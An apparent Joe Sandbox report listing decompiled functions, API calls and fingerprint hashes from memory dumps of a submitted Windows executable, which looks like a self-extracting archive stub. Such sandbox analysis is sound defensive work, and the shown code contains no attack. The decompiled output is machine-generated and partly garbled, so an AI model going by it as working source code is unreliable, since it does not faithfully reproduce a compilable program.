0x000695e5
0x000695f0
0x000695f0
0x000695fb
0x00069600
0x00069600
0x0006959d
0x000694e8
0x000694d3
0x000694c2
0x0006949a
0x00069492
0x00069606
0x0006960c
0x00069616

APIs

__EH_prolog.LIBCMT ref: 00069448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0006946B
GetShortPathNameW.KERNEL32 ref: 0006948A

Part of subcall function 000717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0006BB05,00000000,.exe,?,?,00000800,?,?,000785DF,?), ref: 000717C2

_swprintf.LIBCMT ref: 00069526

Part of subcall function 0006400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0006401D

MoveFileW.KERNEL32(?,?), ref: 00069595
MoveFileW.KERNEL32(?,?), ref: 000695D5

Strings

rtmp%d, xrefs: 0006950F

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: f05e9fe8bff06570335adb9b1176acd310d0a6f18048c9236acc6c4ea6a5eb74
Instruction ID: 3c397fffdff1fcb19a79093477215c0213c432d67c82c4f7e14dfac3e4716edf
Opcode Fuzzy Hash: f05e9fe8bff06570335adb9b1176acd310d0a6f18048c9236acc6c4ea6a5eb74
Instruction Fuzzy Hash: F9416D71900259A6DF30EBA0CC85EEE77BEAF55380F0444E5B549E3442EB788B89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00088FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00088FA5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x9e6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E000885A9(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E0008A671(_t25, _t36, __eflags,  *0x9e6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00088E16(_t25, _t31, "X\xef\xbf							E000884DE(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E000884DE();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00088566(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x9e6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E000885A9(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E0008A671(_t27, _t37, __eflags,  *0x9e6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00088E16(_t27, _t32, "X\xef\xbf									E000884DE(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E000884DE();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0008A61B(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0008A61B(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00088fa5
0x00088fa5
0x00088fa5
0x00088faf
0x00088fb1
0x00088fb6
0x00088fb9
0x00088fc7
0x00088fce
0x00088fd3
0x00088fd6
0x00088fd9
0x00088feb
0x00088ff0
0x00088ff2
0x00088ffd
0x00089004
0x00089009
0x0008900c
0x0008900e
0x00000000
0x00000000
0x00000000
0x00000000
0x00088ff4
0x00088ff4
0x00000000
0x00088ff4
0x00088fdb
0x00088fdb
0x00088fdc
0x00088fdc
0x00088fe1
0x0008901c
0x0008901d
0x00089023
0x00089028
0x0008902b
0x0008902c
0x0008902d
0x00089034
0x00089036
0x00089038
0x0008903d
0x00089040
0x0008904e
0x0008905a
0x0008905d
0x00089060
0x00089072
0x00089077
0x00089079
0x00089084
0x0008908a
0x00089092
0x00089094
0x00000000
0x00000000
0x00000000
0x00000000
0x0008907b
0x0008907b
0x00000000
0x0008907b
0x00089062
0x00089062
0x00089063
0x00089063
0x00089096
0x00089097
0x00089097
0x00089042
0x00089048
0x0008904c
0x0008909f
0x000890a0
0x000890a6
0x00000000
0x00000000
0x00000000
0x0008904c
0x000890ad
0x000890ad
0x00088fbb
0x00088fc1
0x00088fc5
0x00089010
0x00089011
0x0008901b
0x00000000
0x00000000
0x00000000
0x00088fc5

APIs

GetLastError.KERNEL32(?,000A0EE8,00083E14,000A0EE8,?,?,00083713,00000050,?,000A0EE8,00000200), ref: 00088FA9
_free.LIBCMT ref: 00088FDC
_free.LIBCMT ref: 00089004
SetLastError.KERNEL32(00000000,?,000A0EE8,00000200), ref: 00089011
SetLastError.KERNEL32(00000000,?,000A0EE8,00000200), ref: 0008901D
_abort.LIBCMT ref: 00089023

Strings

X, xrefs: 00088FF7

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: X
API String ID: 3160817290-2800284421
Opcode ID: 8dc95b018df2800e67c727b255a45aa7291c12359bf37764c3047a9a7d5296a7
Instruction ID: fc2dcf286bb690896643e4058e97fdbf09f642d76cdc13c8014905314fbf6422
Opcode Fuzzy Hash: 8dc95b018df2800e67c727b255a45aa7291c12359bf37764c3047a9a7d5296a7
Instruction Fuzzy Hash: 1FF02D365049106AD22173246C09FBF396A7BD1760F644126F6D5E2193EF24CD115715

Uniqueness

Uniqueness Score: -1.00%

Function 00070A8A Relevance: 12.1, APIs: 8, Instructions: 115
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00070A8A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0007E900( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0006ACF5() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0x9e084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E00070BF7(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E0007E970( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}

0x00070a8a
0x00070a91
0x00070aa2
0x00070aa6
0x00070ab4
0x00070ad2
0x00070ae3
0x00070af3
0x00070b03
0x00070b15
0x00070b1d
0x00070b23
0x00070b29
0x00070b2d
0x00070b2f
0x00070ab6
0x00070ac0
0x00070ac0
0x00070b3d
0x00070b43
0x00070b4e
0x00070b4f
0x00070b54
0x00070b59
0x00070b5e
0x00070b66
0x00070b6e
0x00070b76
0x00070b7c
0x00070b7e
0x00070b81
0x00070b84
0x00070b89
0x00070b8d
0x00070b92
0x00070b93
0x00070b9a
0x00070b9d
0x00070ba0
0x00070ba3
0x00070ba6
0x00000000
0x00000000
0x00000000
0x00070ba6
0x00070ba8
0x00070ba8
0x00070bb0
0x00070bbc
0x00070bbc
0x00070bcb
0x00070bd1
0x00070bda

APIs

__aulldiv.LIBCMT ref: 00070A9D

Part of subcall function 0006ACF5: GetVersionExW.KERNEL32(?), ref: 0006AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00070AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00070AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00070AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00070AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00070B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00070B3D
__aullrem.LIBCMT ref: 00070BCB

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 5814cd6d9a3f4da29d51813afdf29d6548c09e1b49e3f7bd15cb120376c05059
Instruction ID: ebdb8017dd11fb27ef087661b72fb7a8ddab0c5d8753f17219fab065da64772b
Opcode Fuzzy Hash: 5814cd6d9a3f4da29d51813afdf29d6548c09e1b49e3f7bd15cb120376c05059
Instruction Fuzzy Hash: 704129B1408306DFD714DF65C8849ABF7F8FB88714F008A2EF59692650E739E648CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0008EE2D Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0008EE2D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x9e668; // 0x136d1c5
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xc1298 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xc1298 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00089F27(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xc1298 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xc1298 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xc1298 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00088ADA( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00088ADA();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0007EC4A(_v8 ^ _t136);
			}

0x0008ee35
0x0008ee3c
0x0008ee3f
0x0008ee47
0x0008ee4b
0x0008ee57
0x0008ee5a
0x0008ee5d
0x0008ee64
0x0008ee6c
0x0008ee6f
0x0008ee75
0x0008ee7b
0x0008ee80
0x0008ee82
0x0008ee85
0x0008ee8a
0x0008ee94
0x0008ee9b
0x0008ee9e
0x0008eea5
0x0008eeac
0x0008eed8
0x0008eefe
0x0008ef00
0x00000000
0x0008eeda
0x0008eedd
0x0008efa4
0x0008efb0
0x0008efbb
0x0008efc0
0x0008eee3
0x0008eeea
0x0008eeef
0x0008eef5
0x0008eefb
0x00000000
0x0008eefb
0x0008eef5
0x0008eedd
0x0008eeae
0x0008eeb2
0x0008eeb5
0x0008eebb
0x0008eebd
0x0008eec0
0x0008eec4
0x0008ef01
0x0008ef04
0x0008ef05
0x0008ef0a
0x0008ef10
0x0008ef16
0x0008ef25
0x0008ef2b
0x0008ef31
0x0008ef36
0x0008ef52
0x0008efc5
0x0008efcb
0x0008ef54
0x0008ef5c
0x0008ef65
0x0008ef6b
0x00000000
0x0008ef6d
0x0008ef6f
0x0008ef72
0x0008ef8b
0x00000000
0x0008ef8d
0x0008ef91
0x0008ef93
0x0008ef96
0x00000000
0x0008ef96
0x0008ef91
0x0008ef8b
0x0008ef6b
0x0008ef65
0x0008ef52
0x0008ef36
0x0008ef10
0x00000000
0x0008ef99
0x0008ef99
0x0008efcd
0x0008efdf

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0008F5A2,?,00000000,?,00000000,00000000), ref: 0008EE6F
__fassign.LIBCMT ref: 0008EEEA
__fassign.LIBCMT ref: 0008EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0008EF2B
WriteFile.KERNEL32(?,?,00000000,0008F5A2,00000000,?,?,?,?,?,?,?,?,?,0008F5A2,?), ref: 0008EF4A
WriteFile.KERNEL32(?,?,00000001,0008F5A2,00000000,?,?,?,?,?,?,?,?,?,0008F5A2,?), ref: 0008EF83

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: f167dc2cc40ac5c3c16ed619e68f79ab12b8d9a61c2b5b01d5cea74ee439e90a
Instruction ID: f1360bc6f5c1de475c5bd208a2829a5f96cec2ac2f5d3127f4b958210b23bee7
Opcode Fuzzy Hash: f167dc2cc40ac5c3c16ed619e68f79ab12b8d9a61c2b5b01d5cea74ee439e90a
Instruction Fuzzy Hash: 9151D871D002499FDB14DFA8DC45AEEBBF5FF09310F24412AE695E7292D7309951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0007C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0007C534(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t272;
				signed int _t286;
				void* _t289;
				signed int _t290;
				void* _t294;

				L0:
				while(1) {
					L0:
					_t272 = __ebx;
					if(__ebx != 1) {
						goto L122;
					}
					L106:
					__eax = __ebp - 0x7d50;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
					E0006B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L108:
						_push( *0x9e5f8);
						__ebp - 0x7d50 = E0006400A(0xa946a, __edi, L"%s%s%u", __ebp - 0x7d50);
						__eax = E0006A180(0xa946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L107:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L109:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xa946a);
					__eflags =  *(__ebp - 0x3508);
					if( *(__ebp - 0x3508) == 0) {
						while(1) {
							L172:
							_push(0x1000);
							_t208 = _t294 - 0x15; // 0xffffcae3
							_t209 = _t294 - 0xd; // 0xffffcaeb
							_t210 = _t294 - 0x3508; // 0xffff95f0
							_t211 = _t294 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t294 + 0xc)));
							_t220 = E0007AA36();
							_t272 =  *((intOrPtr*)(_t294 + 0x10));
							 *((intOrPtr*)(_t294 + 0xc)) = _t220;
							if(_t220 != 0) {
								_t221 = _t294 - 0x3508;
								_t289 = _t294 - 0x1bd58;
								_t286 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E000717AC(_t294 - 0xfd58,  *((intOrPtr*)(0x9e618 + _t290 * 4))) != 0) {
								_t290 = _t290 + 1;
								if(_t290 < 0xe) {
									continue;
								} else {
									goto L172;
								}
							}
							__eflags = _t290 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t290 * 4 +  &M0007CAA1))) {
								case 0:
									L9:
									__eflags = _t272 - 2;
									if(_t272 == 2) {
										E00079DA4(_t294 - 0x7d50, 0x800);
										E0006A49D(E0006B965(_t294 - 0x7d50, _t294 - 0x3508, _t294 - 0xdd58, 0x800), _t272, _t294 - 0x8d58, _t290);
										 *(_t294 - 4) = 0;
										E0006A5D7(_t294 - 0x8d58, _t294 - 0xdd58);
										E000670BF(_t294 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t280 = _t294 - 0x8d58;
											_t235 = E0006A52A(_t294 - 0x8d58, _t285, _t294 - 0x5d50);
											__eflags = _t235;
											if(_t235 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t294 - 0x5d50, 0);
											__eflags =  *(_t294 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t239 = GetFileAttributesW(_t294 - 0x5d50);
												__eflags = _t239 - 0xffffffff;
												if(_t239 == 0xffffffff) {
													continue;
												}
												L17:
												_t241 = DeleteFileW(_t294 - 0x5d50);
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													_t292 = 0;
													_push(0);
													goto L20;
													L20:
													E0006400A(_t294 - 0x1108, 0x800, L"%s.%d.tmp", _t294 - 0x5d50);
													_t296 = _t296 + 0x14;
													_t246 = GetFileAttributesW(_t294 - 0x1108);
													__eflags = _t246 - 0xffffffff;
													if(_t246 != 0xffffffff) {
														_t292 = _t292 + 1;
														__eflags = _t292;
														_push(_t292);
														goto L20;
													} else {
														_t249 = MoveFileW(_t294 - 0x5d50, _t294 - 0x1108);
														__eflags = _t249;
														if(_t249 != 0) {
															MoveFileExW(_t294 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0006B4F7(_t280, __eflags, _t294 - 0x7d50, _t294 - 0x1108, 0x800);
											E0006B207(__eflags, _t294 - 0x1108, 0x800);
											_t293 = E000835B3(_t294 - 0x7d50);
											__eflags = _t293 - 4;
											if(_t293 < 4) {
												L14:
												_t260 = E0006B925(_t294 - 0x3508);
												__eflags = _t260;
												if(_t260 != 0) {
													break;
												}
												L15:
												_t263 = E000835B3(_t294 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t294 + _t263 * 2 - 0x5d4e)) = 0;
												E0007F350(0x800, _t294 - 0x40, 0, 0x1e);
												_t296 = _t296 + 0x10;
												 *((intOrPtr*)(_t294 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t266);
												 *((short*)(_t294 - 0x30)) = _t266;
												 *((intOrPtr*)(_t294 - 0x38)) = _t294 - 0x5d50;
												_push(_t294 - 0x40);
												 *0xc2074();
												goto L16;
											}
											L13:
											_t271 = E000835B3(_t294 - 0x1108);
											__eflags = _t293 - _t271;
											if(_t293 > _t271) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t294 - 4) =  *(_t294 - 4) | 0xffffffff;
										E0006A4B3(_t294 - 0x8d58);
									}
									goto L172;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E000835B3(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xbdc84);
										__eax = E000835DE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E00087168(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L000835CE(__esi);
										}
									}
									goto L172;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L172;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L172;
									}
									L42:
									__eflags =  *0xaa472 - __di;
									if( *0xaa472 != __di) {
										goto L172;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E000835B3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L172;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1108 = E0006FE56(__ebp - 0x1108, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1108;
												__eax = E000817CB(__ebp - 0x1108, __ebp - 0x1108);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1108;
												__edi = 0xaa472;
												E0006FE56(0xaa472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
												__eax = E0007A8D0(__ebp - 0x1108, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xaa472); // executed
												__eax = __ebp - 0x1108;
												__eax = E000835E9(__ebp - 0x1108, 0xaa472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
												}
												goto L172;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xc2028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1108;
													_push(__ebp - 0x1108);
													__eax = __ebp - 0x20;
													_push(__ebp - 0x20);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0xc2024();
													_push( *(__ebp - 0x1c));
													 *0xc2004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x1108)) = __cx;
												}
												__eflags =  *(__ebp - 0x1108) - __bx;
